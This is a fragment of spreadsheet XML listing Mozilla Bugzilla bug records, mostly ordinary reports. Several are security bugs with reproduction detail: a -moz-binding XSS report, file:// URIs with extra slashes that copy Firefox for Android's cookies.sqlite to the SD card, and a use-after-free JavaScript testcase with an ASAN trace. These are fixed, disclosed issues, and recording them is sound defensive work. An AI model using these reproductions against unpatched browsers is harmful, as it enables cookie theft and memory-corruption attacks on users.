      <c r="I2798" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J2798" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2798" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2798" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2798" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2798" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2798" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2798" t="inlineStr"/>
      <c r="Q2798" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2798" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2798" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2798" t="n">
        <v>1</v>
      </c>
      <c r="U2798" t="n">
        <v>0</v>
      </c>
      <c r="V2798" t="n">
        <v>2</v>
      </c>
      <c r="W2798" t="inlineStr">
        <is>
          <t>There is no UTF-8 input in `bash` and no UTF-8 in `vi`.
UTF-8 should be allowed in both</t>
        </is>
      </c>
      <c r="X2798" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2799">
      <c r="A2799" t="n">
        <v>1379587</v>
      </c>
      <c r="B2799" t="inlineStr">
        <is>
          <t>2017-07-10 02:56:42 -0700</t>
        </is>
      </c>
      <c r="C2799" t="inlineStr">
        <is>
          <t>White flash when opening new tabs</t>
        </is>
      </c>
      <c r="D2799" t="inlineStr">
        <is>
          <t>2021-11-29 02:44:06 -0800</t>
        </is>
      </c>
      <c r="E2799" t="n">
        <v>1</v>
      </c>
      <c r="F2799" t="n">
        <v>1</v>
      </c>
      <c r="G2799" t="n">
        <v>2</v>
      </c>
      <c r="H2799" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2799" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2799" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K2799" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2799" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2799" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2799" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2799" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2799" t="inlineStr">
        <is>
          <t>[reserve-photon-performance]</t>
        </is>
      </c>
      <c r="Q2799" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2799" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2799" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T2799" t="n">
        <v>1</v>
      </c>
      <c r="U2799" t="n">
        <v>2</v>
      </c>
      <c r="V2799" t="n">
        <v>54</v>
      </c>
      <c r="W2799" t="inlineStr">
        <is>
          <t>STR:
a) Open a private window
b) Open a new tab in that window
The about:privatebrowsing page has a purple background, and a white flash can be observed before the page is visible. I haven't taken any precise measurements, but the duration of the flash ranges between a split second (barely noticeable) to nearly a full second on my fast MacBook.
Additionally, the stop/reload button animates (IMO, it shouldn't), but I'll file a separate bug for that (though it's possible that the fix for one will also fix the other).</t>
        </is>
      </c>
      <c r="X2799" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2800">
      <c r="A2800" t="n">
        <v>324253</v>
      </c>
      <c r="B2800" t="inlineStr">
        <is>
          <t>2006-01-21 09:57:50 -0800</t>
        </is>
      </c>
      <c r="C2800" t="inlineStr">
        <is>
          <t>CVE-2006-0496 Do something about the XSS issues -moz-binding introduces</t>
        </is>
      </c>
      <c r="D2800" t="inlineStr">
        <is>
          <t>2009-09-18 14:56:49 -0700</t>
        </is>
      </c>
      <c r="E2800" t="n">
        <v>1</v>
      </c>
      <c r="F2800" t="n">
        <v>1</v>
      </c>
      <c r="G2800" t="n">
        <v>3</v>
      </c>
      <c r="H2800" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2800" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2800" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K2800" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2800" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2800" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2800" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2800" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2800" t="inlineStr">
        <is>
          <t>[sg:want P4] IE has similar issues when sites include untrusted stylesheets, see comment 23</t>
        </is>
      </c>
      <c r="Q2800" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2800" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2800" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2800" t="n">
        <v>1</v>
      </c>
      <c r="U2800" t="n">
        <v>14</v>
      </c>
      <c r="V2800" t="n">
        <v>38</v>
      </c>
      <c r="W2800" t="inlineStr">
        <is>
          <t>From the URL:
"Late last week we become aware that it was possible to use the "-moz-binding" CSS attribute within Mozilla and Mozilla Firefox to execute arbitrary offsite JavaScript. As this attribute is designed to allow attaching an XBL transform and JavaScript to any node within the DOM, it is quite easy to use in a malicious fashion. We immediately altered our cleaner to strip this attribute from entries and comments, though also realized that wasn't even half the battle."</t>
        </is>
      </c>
      <c r="X2800" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2801">
      <c r="A2801" t="n">
        <v>637452</v>
      </c>
      <c r="B2801" t="inlineStr">
        <is>
          <t>2011-02-28 13:46:03 -0800</t>
        </is>
      </c>
      <c r="C2801" t="inlineStr">
        <is>
          <t>[Fx4Launch] Updated release note design for Firefox 4 final</t>
        </is>
      </c>
      <c r="D2801" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E2801" t="n">
        <v>1</v>
      </c>
      <c r="F2801" t="n">
        <v>1</v>
      </c>
      <c r="G2801" t="n">
        <v>5</v>
      </c>
      <c r="H2801" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2801" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2801" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2801" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2801" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2801" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2801" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2801" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2801" t="inlineStr"/>
      <c r="Q2801" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2801" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2801" t="inlineStr">
        <is>
          <t>1.4</t>
        </is>
      </c>
      <c r="T2801" t="n">
        <v>1</v>
      </c>
      <c r="U2801" t="n">
        <v>0</v>
      </c>
      <c r="V2801" t="n">
        <v>8</v>
      </c>
      <c r="W2801" t="inlineStr">
        <is>
          <t>Not sure if this is covered in other plans, but the release notes (see https://www.mozilla.com/en-US/firefox/4.0b12/releasenotes/) for FF4 are ugly due to the recent mozilla.com site redesign. This bug will track making them respectable for final. It could be as little as changing the background to the current site design or redesigning the page entirely, I am indifferent.</t>
        </is>
      </c>
      <c r="X2801" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2802">
      <c r="A2802" t="n">
        <v>1050690</v>
      </c>
      <c r="B2802" t="inlineStr">
        <is>
          <t>2014-08-08 01:27:44 -0700</t>
        </is>
      </c>
      <c r="C2802" t="inlineStr">
        <is>
          <t>Download arbitrary files to SD card via additional slashes in file: URI</t>
        </is>
      </c>
      <c r="D2802" t="inlineStr">
        <is>
          <t>2024-05-30 08:36:34 -0700</t>
        </is>
      </c>
      <c r="E2802" t="n">
        <v>1</v>
      </c>
      <c r="F2802" t="n">
        <v>1</v>
      </c>
      <c r="G2802" t="n">
        <v>6</v>
      </c>
      <c r="H2802" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2802" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2802" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2802" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L2802" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2802" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2802" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2802" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2802" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q2802" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2802" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2802" t="inlineStr">
        <is>
          <t>Firefox 34</t>
        </is>
      </c>
      <c r="T2802" t="n">
        <v>1</v>
      </c>
      <c r="U2802" t="n">
        <v>0</v>
      </c>
      <c r="V2802" t="n">
        <v>17</v>
      </c>
      <c r="W2802" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Steps to reproduce:
If we input the URL in the address bar such as:
file:///data/data/org.mozilla.firefox/files/mozilla/xxxxxxxx.default/cookies.sqlite
the download will not be invoked because the update in Firefox 28.0.1
But we can simply add ‘/’ before folders in the URL:
file:////data/data/org.mozilla.firefox/files/mozilla/gnxblohb.default/cookies.sqlite
Actual results:
The cookies will be automatically downloaded in the SDcard so that all apps in the devices get access to the cookies which save users privacy information.
Expected results:
No matter what users input in the address bar, the cookies should not be downloaded into SDcard.</t>
        </is>
      </c>
      <c r="X2802" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2803">
      <c r="A2803" t="n">
        <v>472668</v>
      </c>
      <c r="B2803" t="inlineStr">
        <is>
          <t>2009-01-08 06:44:42 -0800</t>
        </is>
      </c>
      <c r="C2803" t="inlineStr">
        <is>
          <t>Crash [@ nsFrame::GetBoxAscent] with binding, observes and DOMAttrModified</t>
        </is>
      </c>
      <c r="D2803" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2803" t="n">
        <v>1</v>
      </c>
      <c r="F2803" t="n">
        <v>1</v>
      </c>
      <c r="G2803" t="n">
        <v>3</v>
      </c>
      <c r="H2803" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2803" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2803" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2803" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2803" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2803" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2803" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2803" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2803" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed by 468211</t>
        </is>
      </c>
      <c r="Q2803" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2803" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2803" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2803" t="n">
        <v>1</v>
      </c>
      <c r="U2803" t="n">
        <v>0</v>
      </c>
      <c r="V2803" t="n">
        <v>19</v>
      </c>
      <c r="W2803" t="inlineStr">
        <is>
          <t>Created attachment 355970
binding needed for testcase
See upcoming testcase, which crashes current trunk build.
It also crashes Firefox 3, so marking security sensitive for now.
It doesn't crash Firefox 2, I can look for a regression range, if wanted.
http://crash-stats.mozilla.com/report/index/4d1fdf06-c323-4d3c-baeb-f3cf12090108?p=1
0  	xul.dll  	nsFrame::GetBoxAscent  	 layout/generic/nsFrame.cpp:6352
1 	xul.dll 	nsSprocketLayout::GetAscent 	layout/xul/base/src/nsSprocketLayout.cpp:1525
2 	xul.dll 	nsStyleContext::GetStyleVisibility 	layout/style/nsStyleStructList.h:103</t>
        </is>
      </c>
      <c r="X2803" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2804">
      <c r="A2804" t="n">
        <v>105960</v>
      </c>
      <c r="B2804" t="inlineStr">
        <is>
          <t>2001-10-21 17:02:46 -0700</t>
        </is>
      </c>
      <c r="C2804" t="inlineStr">
        <is>
          <t>xml.cgi and other future xml pages generate invalid XML</t>
        </is>
      </c>
      <c r="D2804" t="inlineStr">
        <is>
          <t>2010-09-18 11:29:23 -0700</t>
        </is>
      </c>
      <c r="E2804" t="n">
        <v>1</v>
      </c>
      <c r="F2804" t="n">
        <v>1</v>
      </c>
      <c r="G2804" t="n">
        <v>4</v>
      </c>
      <c r="H2804" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2804" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2804" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K2804" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="L2804" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2804" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2804" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2804" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2804" t="inlineStr"/>
      <c r="Q2804" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2804" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2804" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T2804" t="n">
        <v>1</v>
      </c>
      <c r="U2804" t="n">
        <v>0</v>
      </c>
      <c r="V2804" t="n">
        <v>53</v>
      </c>
      <c r="W2804" t="inlineStr">
        <is>
          <t>Because xml.cgi basically hand crafts xml instead of using the standard perl XML
libraries, it doesn't escape/encode umlauts (for example), so the XML it creates
is invalid. This means that sane XML libraries looking to parse the code are...
well, displeased. 
Because we are moving towards templates for all data output (not just xml.cgi),
it seems unlikely that this problem is going to be solved the 'correct' way-
i.e., by using the perl XML libraries to create properly encoded XML.
So... I'm not entirely sure that there is any elegant solution to this, except
maybe to provide a 'encode_this_like_XML_likes()' function that can be called
iff xml is chosen as the output format. Not sure how that would work, though.
But it is a problem, and will continue to be if people want to use standard
system libraries (on both linux and windows) to create interaction with bugzilla.</t>
        </is>
      </c>
      <c r="X2804" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2805">
      <c r="A2805" t="n">
        <v>803228</v>
      </c>
      <c r="B2805" t="inlineStr">
        <is>
          <t>2012-10-18 12:32:41 -0700</t>
        </is>
      </c>
      <c r="C2805" t="inlineStr">
        <is>
          <t>Assertion failure: cx-&gt;compartment-&gt;principals == options.principals</t>
        </is>
      </c>
      <c r="D2805" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2805" t="n">
        <v>1</v>
      </c>
      <c r="F2805" t="n">
        <v>1</v>
      </c>
      <c r="G2805" t="n">
        <v>6</v>
      </c>
      <c r="H2805" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2805" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2805" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2805" t="inlineStr">
        <is>
          <t>18 Branch</t>
        </is>
      </c>
      <c r="L2805" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2805" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2805" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2805" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2805" t="inlineStr">
        <is>
          <t>[fixed by bug 824864][adv-main21+]</t>
        </is>
      </c>
      <c r="Q2805" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2805" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2805" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2805" t="n">
        <v>1</v>
      </c>
      <c r="U2805" t="n">
        <v>0</v>
      </c>
      <c r="V2805" t="n">
        <v>20</v>
      </c>
      <c r="W2805" t="inlineStr">
        <is>
          <t>1. http://www.aol.com 
2. Assertion failure: cx-&gt;compartment-&gt;principals == options.principals, at c:/work/mozilla/builds/nightly/mozilla/js/src/jsapi.cpp:5689
s-s 'cause compartments are scary, mkay?
Windows XP Nightly so far. Doesn't appear to crash opt build.</t>
        </is>
      </c>
      <c r="X2805" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2806">
      <c r="A2806" t="n">
        <v>844375</v>
      </c>
      <c r="B2806" t="inlineStr">
        <is>
          <t>2013-02-22 17:36:11 -0800</t>
        </is>
      </c>
      <c r="C2806" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.17 Beta 1</t>
        </is>
      </c>
      <c r="D2806" t="inlineStr">
        <is>
          <t>2013-02-28 21:34:17 -0800</t>
        </is>
      </c>
      <c r="E2806" t="n">
        <v>1</v>
      </c>
      <c r="F2806" t="n">
        <v>1</v>
      </c>
      <c r="G2806" t="n">
        <v>2</v>
      </c>
      <c r="H2806" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2806" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2806" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K2806" t="inlineStr">
        <is>
          <t>SeaMonkey 2.17 Branch</t>
        </is>
      </c>
      <c r="L2806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2806" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2806" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2806" t="inlineStr"/>
      <c r="Q2806" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2806" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2806" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2806" t="n">
        <v>1</v>
      </c>
      <c r="U2806" t="n">
        <v>0</v>
      </c>
      <c r="V2806" t="n">
        <v>2</v>
      </c>
      <c r="W2806" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.17 Beta 1
We expect an actual release on Tuesday 26th February.</t>
        </is>
      </c>
      <c r="X2806" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2807">
      <c r="A2807" t="n">
        <v>1495741</v>
      </c>
      <c r="B2807" t="inlineStr">
        <is>
          <t>2018-10-02 07:05:31 -0700</t>
        </is>
      </c>
      <c r="C2807" t="inlineStr">
        <is>
          <t>Multiple fixes for issues related to memory usage + configuration options for managing memory usage</t>
        </is>
      </c>
      <c r="D2807" t="inlineStr">
        <is>
          <t>2018-12-13 07:19:24 -0800</t>
        </is>
      </c>
      <c r="E2807" t="n">
        <v>1</v>
      </c>
      <c r="F2807" t="n">
        <v>1</v>
      </c>
      <c r="G2807" t="n">
        <v>7</v>
      </c>
      <c r="H2807" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2807" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J2807" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2807" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L2807" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2807" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2807" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2807" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2807" t="inlineStr"/>
      <c r="Q2807" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2807" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2807" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2807" t="n">
        <v>1</v>
      </c>
      <c r="U2807" t="n">
        <v>0</v>
      </c>
      <c r="V2807" t="n">
        <v>6</v>
      </c>
      <c r="W2807" t="inlineStr">
        <is>
          <t>07:07 &lt;ckolos&gt; the bugzilla memory issue is causing the service to die in such a way that the health check from the elb *isn't* failing
07:08 &lt;ckolos&gt; or at least failing in a way that's triggering autoscaling.
My hunch is that this is the /rest/product API.
On -dev, we observed this using 2G of memory (and subsequently being killed by the oom-killer). Looking in the logs, it seems that (probably recently) this API has seen more use, up to 250 times per day.</t>
        </is>
      </c>
      <c r="X2807" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2808">
      <c r="A2808" t="n">
        <v>1196105</v>
      </c>
      <c r="B2808" t="inlineStr">
        <is>
          <t>2015-08-18 22:11:53 -0700</t>
        </is>
      </c>
      <c r="C2808" t="inlineStr">
        <is>
          <t>Heartbeat: Audit/fix possible data leaks for the private window targeting option</t>
        </is>
      </c>
      <c r="D2808" t="inlineStr">
        <is>
          <t>2016-05-10 09:12:21 -0700</t>
        </is>
      </c>
      <c r="E2808" t="n">
        <v>1</v>
      </c>
      <c r="F2808" t="n">
        <v>1</v>
      </c>
      <c r="G2808" t="n">
        <v>2</v>
      </c>
      <c r="H2808" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2808" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2808" t="inlineStr">
        <is>
          <t>Tours</t>
        </is>
      </c>
      <c r="K2808" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2808" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2808" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2808" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2808" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2808" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q2808" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2808" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2808" t="inlineStr">
        <is>
          <t>Firefox 43</t>
        </is>
      </c>
      <c r="T2808" t="n">
        <v>1</v>
      </c>
      <c r="U2808" t="n">
        <v>0</v>
      </c>
      <c r="V2808" t="n">
        <v>17</v>
      </c>
      <c r="W2808" t="inlineStr">
        <is>
          <t>For the private window option added in bug 1196104, we should ensure that it doesn't leak whether a user has/had a private window open. We should double-check that the callbacks/URLs don't leak this information and fix cases that do.
Some cases to fix:
* All of the Heartbeat notifications/events leak to Heartbeat whether or not a private window is open. We should probably always suppress these events/notifications when heartbeat is targeting private windows.
* The flowId shouldn't be passed along in URLs as the flowId could be specific to the private browsing recipe</t>
        </is>
      </c>
      <c r="X2808" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2809">
      <c r="A2809" t="n">
        <v>1286183</v>
      </c>
      <c r="B2809" t="inlineStr">
        <is>
          <t>2016-07-12 01:33:03 -0700</t>
        </is>
      </c>
      <c r="C2809" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsNodeUtils::NativeAnonymousChildListChange</t>
        </is>
      </c>
      <c r="D2809" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:09 -0700</t>
        </is>
      </c>
      <c r="E2809" t="n">
        <v>1</v>
      </c>
      <c r="F2809" t="n">
        <v>1</v>
      </c>
      <c r="G2809" t="n">
        <v>3</v>
      </c>
      <c r="H2809" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2809" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2809" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2809" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L2809" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2809" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2809" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2809" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2809" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q2809" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2809" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2809" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T2809" t="n">
        <v>1</v>
      </c>
      <c r="U2809" t="n">
        <v>0</v>
      </c>
      <c r="V2809" t="n">
        <v>19</v>
      </c>
      <c r="W2809" t="inlineStr">
        <is>
          <t>The testcase crashes the latest ASAN build of Firefox (BuildID=20160711143746).
&lt;script&gt;
function start() {
        o0=window.document;
        o631=(new DOMParser()).parseFromString('','text/html');
        o652=o631.all[0];
        o652.id='id48';
        document.replaceChild(o631.documentElement,document.documentElement);
        o928=o0.createElement('canvas');
        o1238=o928.getContext('2d',{storage: false,});
        o1238.filter='url(#id48)';
        o0=null;o631=null;o652=null;o928=null;o1238=null;
        window.setTimeout("location.reload()", 30000); // should be enough to trigger CC
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
=================================================================
==14981==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b00013aad0 at pc 0x7f76ba850eb1 bp 0x7ffdfd43ee90 sp 0x7ffdfd43ee88
READ of size 8 at 0x60b00013aad0 thread T0 (Web Content)
    #0 0x7f76ba850eb0 in nsNodeUtils::NativeAnonymousChildListChange(nsIContent*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsNodeUtils.cpp:177:3
    #1 0x7f76ba515ac7 in mozilla::dom::Element::UnbindFromTree(bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Element.cpp:1761:7
    #2 0x7f76ba37689e in AnonymousContentDestroyer::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsContentUtils.cpp:4849:5
    #3 0x7f76ba35256e in nsContentUtils::RemoveScriptBlocker() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsContentUtils.cpp:5085:5
    #4 0x7f76bea8c6fd in ~nsAutoScriptBlocker /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsContentUtils.h:2787:5
    #5 0x7f76bea8c6fd in nsDocumentViewer::DestroyPresShell() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:4401
    #6 0x7f76bea7b106 in nsDocumentViewer::Destroy() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:1648:5
    #7 0x7f76bea8e9d4 in nsDocumentViewer::Show() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:1980:5
    #8 0x7f76beb02c90 in nsPresContext::EnsureVisible() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresContext.cpp:2000:27
    #9 0x7f76beb2965e in PresShell::UnsuppressAndInvalidate() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:3829:40
    #10 0x7f76beb2d21c in PresShell::ProcessReflowCommands(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:9820:5
    #11 0x7f76beb2bf37 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:4147:11
